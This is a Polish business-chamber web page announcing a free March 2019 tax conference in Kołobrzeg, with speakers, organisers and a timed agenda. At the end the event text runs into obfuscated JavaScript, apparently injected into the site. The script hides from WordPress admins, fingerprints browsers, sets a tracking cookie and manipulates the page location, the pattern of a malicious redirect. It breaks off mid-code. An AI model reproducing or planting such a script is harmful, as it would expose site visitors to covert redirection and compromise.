Zapraszamy do udziału w konferencji pt. „Nowe obowiązki podatników, dyrektorów finansowych i księgowych wprowadzone w 2019 roku” | Północna Izba Gospodarcza w Koszalinie

Serdecznie zapraszamy Państwa do udziału w konferencji pt. „Nowe obowiązki podatników, dyrektorów finansowych i księgowych wprowadzone w 2019 roku”, która odbędzie się w środę 27 marca 2019 roku w Diune Hotel *****& Resort przy ul. Sułkowskiego 4A w Kołobrzegu.

Gościem specjalnym konferencji będzie Profesor Witold Modzelewski z Instytutu Studiów Podatkowych w Warszawie. Organizatorem konferencji jest M Broker Ubezpieczeniowy Sp. z o.o. w Bydgoszczy przy współorganizacji Starostwa Powiatowego w Kołobrzegu i Północnej Izby Gospodarczej w Koszalinie. Patronat honorowy nad konferencją objął Starosta Kołobrzeski Tomasz Tamborski.

Ze względu na ograniczoną liczbę miejsc, udział jest możliwy wyłącznie za zaproszeniem. Prosimy o informację, czy Państwa Firma będzie zainteresowana udziałem w w/w konferencji.

Uczestnictwo w konferencji jest bezpłatne.

Potwierdzenie chęci udziału prosimy przesyłać, drogą mailową na adres: dariusz.sitterlee@mbu.com.pl do dnia 11 marca 2019 roku z podaniem danych osoby do kontaktu.

Agenda Konferencji:

8:30 – 9:00 – rejestracja zaproszonych gości

9:00 – 9:15  – otwarcie Konferencji, słowo wprowadzające – Tomasz Tamborski – Starosta Kołobrzeski

9:15 – 10:30 – obowiązki podatników, dyrektorów finansowych i księgowych dotyczące rozliczeń podatkowych, które wprowadzono z dniem 1 stycznia 2019 r. Implementacja Dyrektywy UE na temat raportowania schematów podatkowych – wykład Profesora Witolda Modzelewskiego cz.1

10:30 – 10:45 – przerwa kawowa

10:45 – 11:45 – schematy podatkowe i ich konsekwencje wykład Profesora Witolda Modzelewskiego cz.2

11:45 – 12:00 – rozwiązania dla firm w zakresie ryzyk podatkowych – Dariusz Sitterlee –  M Broker Ubezpieczeniowy Sp. z o.o.

12:00 – 12:15 – przerwa kawowa

12:15 – 13:15 – Split payment: zastosowanie podzielonej płatności i jej konsekwencje wykład Profesora Witolda Modzelewskiego cz.3

13:15 – 13:30 – przerwa kawowa

13:30 – 15:00 – dyskusja – sesja pytań do Profesora Witolda Modzelewskiego

15:00 – podsumowanie  i zakończenie Konferencji

Patronat: Starosta Kołobrzeski – Tomasz Tamborski

Organizator: M Broker Ubezpieczeniowy Sp. z o.o. w Bydgoszczy

Współorganizatorzy: Północna Izba Gospodarcza w Koszalinie 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m